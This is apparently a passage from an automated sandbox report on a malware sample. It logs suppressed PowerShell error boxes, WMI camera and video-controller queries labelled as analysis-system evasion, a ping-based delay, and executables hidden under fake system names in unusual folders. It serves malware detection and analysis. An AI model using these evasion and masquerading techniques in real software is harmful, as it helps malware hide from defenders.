                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Memory allocated: C30000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe Memory allocated: 1A7A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 32F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1B2F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 13E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1AFA0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1030000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1AC90000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1760000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe Memory allocated: 1B150000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 3120000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 1B3F0000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: C50000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 1A790000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: 1130000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: 1B150000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: 1780000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe Memory allocated: 1B570000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 26D0000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe Memory allocated: 1A900000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 11D0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1B0A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1770000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
